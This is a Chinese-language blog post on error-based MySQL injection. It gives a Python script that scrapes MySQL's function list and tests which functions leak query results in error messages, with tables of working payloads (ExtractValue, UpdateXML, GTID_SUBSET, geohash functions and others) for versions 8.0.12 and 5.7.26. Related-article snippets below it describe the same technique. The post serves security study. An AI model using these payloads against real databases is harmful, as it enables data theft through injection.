MYSQL注入之XPATH语法错误报错扩展

最新推荐文章于 2024-04-09 19:36:54 发布
最新推荐文章于 2024-04-09 19:36:54 发布
阅读量747 收藏
点赞数
分类专栏: 学习笔记 文章标签: mysql python 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cyynid/article/details/131056496
版权

XPATH语法错误:

  从mysql5.1.5开始提供两个XML查询和修改的函数,extractvalue()和updatexml()。

Extractvalue()负责在xml文档中按照xpath语法查询节点内容updatexml()则负责修改查询到的内容

报错原理:
这两个函数的第二个参数都要求是符合xpath语法的字符串,如果不满足要求就会报错,并且会把查询结果放在报错信息里。

但是对于此类报错来说,其报错函数并不止上述提供的两个,不同的数据库版本有不同的报错函数,本文提供一个自动化脚本,可以自动化的检测各个版本的Xpath报错函数,其原理非常简单,就是通过爬虫爬取mysql官方文档的函数内容,构造报错输入,进行测试,来实现自动化的报错函数检测。

#使用python对网页进行爬取,然后进行数据处理

#对目标进行观察,后发现,函数名有以下特征

#都处于标签scope="row"之下,并且没有被<>包裹,因此可以用xpath进行定位,然后使用正则提取出函数名

#使用python对网页进行爬取,然后进行数据处理

#对目标进行观察,后发现,函数名有以下特征

#都处于标签scope="row"之下,并且没有被<>包裹,因此可以用xpath进行定位,然后使用正则提取出函数名

#使用python对网页进行爬取,然后进行数据处理
#对目标进行观察,后发现,函数名有以下特征
#都处于标签scope="row"之下,并且没有被<>包裹,因此可以用xpath进行定位,然后使用正则提取出函数名
import requests
import pymysql
from lxml import etree
import os
import re
import sys
target='<a class="link" .+><code class="literal">.+[[<em class="replaceable"><code>.+\n</code></em>].*]+'
url="https://dev.mysql.com/doc/refman/5.0/en/built-in-function-reference.html"
header={
    'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36'
}
def get_page(url,header):
    target_url=url
    target_header=header
    response=requests.get(url=url,headers=target_header)
    return response
def get_link(page_content,func_list):
    result=etree.HTML(page_content.text)
    element_=result.xpath('//*[@scope="row"]')
    for each in element_:
        data=etree.tostring(each,encoding='utf-8').decode('utf-8')
        #print(data)
        one=re.sub('\<.*?\>','',data)
        func_list.append(one)
    return element_
def connect_to_mysql():
    conn = pymysql.connect(host='localhost',port=3306,user='root',passwd='root', charset = 'utf8' )
    cursor = conn.cursor()
    #cursor.errorhandler
    return cursor
def test_sql(cursor,func_list,error_list):
    #for each in linklist:
    for each in func_list:
        sql=[]
        sql.append('select '+each[0:-2]+'concat(\'~\',version()))')
        sql.append('select '+each[0:-2]+'1,concat(\'~\',version()))')
        sql.append('select '+each[0:-2]+'concat(\'~\',version()),1)')
        sql.append('select '+each[0:-2]+'concat(\'~\',version()),1,1)')
        sql.append('select '+each[0:-2]+'1,1,concat(\'~\',version()),1,1)')
        sql.append('select '+each[0:-2]+'1,concat(\'~\',version()),1)')
        for each in sql:
            #print(each)
            try :
                cursor.execute(each)
            except:
                info=sys.exc_info()
                print( info[0], ":", info[1])  
                if '5.0' in str(info[1]):
                    error_list.append(each+str(info[1]))

if __name__=="__main__":
    func_list=[]
    error_list=[]
    cursor=connect_to_mysql()
    page_content=get_page(url,header)
    link=get_link(page_content,func_list)
    params=["version()","version(),1","1,version()","version(),1,1","1,version(),1","1,1,version()"]
    #print(func_list)
 
    test_sql(cursor,func_list,error_list)
    print(error_list)

以下就是对某几个sql版本进行检测所得到的结果

8.0.12

报错函数  报错语句 报错内容
BIN_TO_UUID select BIN_TO_UUID(concat(\'~\',version())) Incorrect string value: \'~8.0.12\' for function bin_to_uuid
ExtractValue     select ExtractValue(1,concat(\'~\',version()))"XPATH syntax error: \'~8.0.12\'"
GTID_SUBSET  select GTID_SUBSET(concat(\'~\',version()),1)  "Malformed GTID set specification \'~8.0.12\'.")
GTID_SUBTRACT        select GTID_SUBTRACT(concat(\'~\',version()),1)  Malformed GTID set specification \'~8.0.12\'."
ST_LatFromGeoHash    select ST_LatFromGeoHash(concat(\'~\',version())) "Incorrect geohash value: \'~8.0.12\'
ST_LongFromGeoHash    select ST_LongFromGeoHash(concat(\'~\',version())) Incorrect geohash value: \'~8.0.12\' for function ST_LONGFROMGEOHASH"
UpdateXML     select UpdateXML(1,concat(\'~\',version()),1)     "XPATH syntax error: \'~8.0.12\'"
UUID_TO_BIN          select UUID_TO_BIN(concat(\'~\',version())    "Incorrect string value: \'~8.0.12\' for function uuid_to_bin"

15.7.26

报错函数   报错语句 报错内容
ExtractValue   select ExtractValue(1,concat(\'~\',version()))XPATH syntax error: \'~5.7.26\'"
GTID_SUBSET  select GTID_SUBSET(concat(\'~\',version()),1) Malformed GTID set specification \'~5.7.26\'."
GTID_SUBTRACT   select GTID_SUBTRACT(concat(\'~\',version()),1) "Malformed GTID set specification \'~5.7.26\'.")'
ST_LatFromGeoHash select ST_LatFromGeoHash(concat(\'~\',version())) "Incorrect geohash value: \'~5.7.26\'
ST_LongFromGeoHash    select ST_LongFromGeoHash(concat(\'~\',version()))"Incorrect geohash value: \'~5.7.26\' for function ST_LONGFROMGEOHASH
ST_PointFromGeoHash select ST_PointFromGeoHash(concat(\'~\',version()),1)"Incorrect geohash value: \'~5.7.26\' for function st_pointfromgeohash")
UpdateXML  select UpdateXML(1,concat(\'~\',version()),1)  "XPATH syntax error: \'~5.7.26\'")']

 

 

 

辰霖心
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mysql漏洞函数xpath_XPATH注入
weixin_30185907的博客
01-28 661
前言在网上看到了一个XPATH注入,发现自己确实有的地方没见过。。就拿来学习了一下链接:XPATHXPath 即为 XML 路径语言,是 W3C XSLT 标准的主要元素,它是一种用来确定 XML(标准通用标记语言的子集)文档中某部分位置的语言。XPath 基于 XML 的树状结构,有不同类型的节点,包括元素节点,属性节点和文本节点,提供在数据结构树中找寻节点的能力,可用来在 XML 文档中对元素...
XPATH报错注入
7hinkSource的博客
08-12 835
extractvalue() extractvalue() :对XML文档进行查询的函数 语法:extractvalue(文档,路径) 路径写入其他格式,就会报错并且会返回我们写入的非法格式内容,我们可以利用这个得到我们想得到的内容 正常查询 第二个参数的位置格式 为 /x/xx ,即使查询不到也不会报错 select username from security.user where id=1 and (extractvalue(‘1’,’/x/xx’)) 使用concat()拼接 ‘ / ‘ 效果
已解决javax.xml.xpath.XPathExpressionException: XPath表达式异常的正确解决方法,亲测有效!!!
最新发布
小明的Java问道之路
04-09 932
已解决javax.xml.xpath.XPathExpressionException: XPath表达式异常的正确解决方法,亲测有效!!!
Xpath 报错注入
weixin_73180072的博客
12-04 398
Xpath 报错注入
Xpath报错注入(extractvalue和updatexml)
石页
03-25 1267
updatexml() 函数报错注入原理 updatexml() 函数定义 UPDATEXML (XML_document, XPath_string, new_value); 第一个参数:XML_document是String格式,为XML文档对象的名称; 第二个参数:XPath_string (Xpath格式的字符串); 第三个参数:new_value,String格式,替换查找到的符合条件的数据; updatexml() 函数运行机制 该函数对XPath_string进行查询操作
xpath报错注入
硫酸超的博客
07-30 1059
xpath报错注入(extractvalue和updatexml)知识铺垫updatexml()函数实操extractvalue()函数实操 知识铺垫 在mysql高版本(大于5.1版本)中添加了对XML文档进行查询和修改的函数: updatexml() extractvalue() 当这两个函数在执行时,如果出现xml文档路径错误就会产生报错 updatexml()函数 updatexml()是一个使用不同的xml标记匹配和替换xml块的函数。 作用:改变文档中符合条件的节点的值 语法: updatexm
sql注入练习1(XPath报错
kkzzjx
05-29 620
文章为自我记录,相关原理还是得自己查呀 前置知识xpath XPath 使用路径表达式在 XML 文档中选取节点。节点是通过沿着路径或者 step 来选取的。 下面列出了最有用的路径表达式: 表达式 描述 nodename 选取此节点的所有子节点。 / 从根节点选取。 // 从匹配选择的当前节点选择文档中的节点,而不考虑它们的位置。 . 选取当前节点。 … 选取当前节点的父节点。 @ 选取属性。 实例 在下面的表格中,我们已列出了一些路径表达式以及表达式的结果: .
MYSQL updatexml()函数报错注入解析
09-09
XPath语法错误通常表明提供的路径表达式不符合XPath规范,比如预期的节点名、路径分隔符或运算符使用不当。在上述错误中,`:root@localhost`看起来像一个不正确的节点名,这通常不会出现在正常的XPath表达式中。 ...
chrome扩展工具之xpath helper
02-22
chrome浏览器下解析html十分好用的扩展工具,可以方便的检测xpath语法是否正确,在爬虫解析时十分有用
解析XPath语法之在C#中使用XPath的示例详解
09-05
首先,让我们来看看XPath的基本语法: 1. `/` 表示从根节点开始选择。例如,`/pets` 会选择XML文档中的`<pets>`元素。 2. `//` 表示在整个文档中查找,忽略当前节点的位置。例如,`//price` 会选取所有`<price>`...
Xpath语法格式总结
10-19
主要介绍了Xpath语法格式总结的相关内容,比较全面,这里分享给大家,如有不足之处欢迎补充。
XPath注入漏洞利用工具XPath-XCat.zip
07-19
XCat是一个命令行程序,用于辅助XPath注入漏洞的利用。XCat使用Python编写并开放源代码。XCat正常使用需要python的SimpleXMLWriter模块。 标签:XPath
C#操作xml之xpath语法
10-29
C#对xml中关于使用xpath语法的介绍
xpath语法及问题简略解析
g11023225的博客
05-12 466
tags: python,xpath,爬虫,requests,lxml 使用xpath进行网页爬虫的基本步骤 import requests from lxml import etree headers = { 'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36' ' (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36' } .
xpath 爬虫错误求指教
weixin_46613397的博客
06-25 367
标题 xpath 爬虫错误求指教 import parsel #1、获取数据源,headers参数 base_url = "https://www.umei.cc/gaoxiaotupian/" headers = {'user-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36 Edg/83.0.478.54'}
sql注入报错注入
热门推荐
silence1_的博客
06-04 3万+
报错注入 报错注入在没法用union联合查询时用,但前提还是不能过滤一些关键的函数。 报错注入就是利用了数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。这里主要记录一下xpath语法错误和concat+rand()+group_by()导致主键重复 xpath语法错误 利用xpath语法错误来进行报错注入主要利用extractvalue和updatexml两个函数。 使用...
xpath注入详解(三)
Endeavour的博客
06-25 486
一、xpath实列分析(实例1) 主流脚本语言都支持对XPath的处理,本次实例分析以PHP来学习XPath注入的原理; blog.xml: <?xml version="1.0" encoding="UTF-8"?> <root> <users> <user> <id>1<...
mysql漏洞函数xpath_【渗透重点】原理分析+题目实战轻松掌握SQL注入
weixin_31905417的博客
01-28 500
原标题:【渗透重点】原理分析+题目实战轻松掌握SQL注入前言:SQL注入是web安全中最常见的攻击方式,SQL注入有很多方法,但如果只知道payload,不知道原理,感觉也很难掌握,这次就总结一下我所遇到的SQL注入方法,原理分析+题目实战。0 1Xpath报错注入涉及函数updatexml:对xml进行查询和修改extractvalue:对xml进行查询和修改报错语句构造selectextrac...
from xlml import xpathxpath报错
12-09
根据提供的引用内容,可能是由于您在导入模块时出现了拼写错误。正确的导入语句应该是`from lxml import etree`。然后,您可以使用`etree.XPath`来执行XPath查询。以下是一个简单的示例: ```python from lxml import etree # 创建XML文档 root = etree.Element("root") root.append(etree.Element("child")) root.append(etree.Element("child")) child1 = root[0] child2 = root[1] # 执行XPath查询 result = root.xpath("//child") print(len(result)) # 输出:2 ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值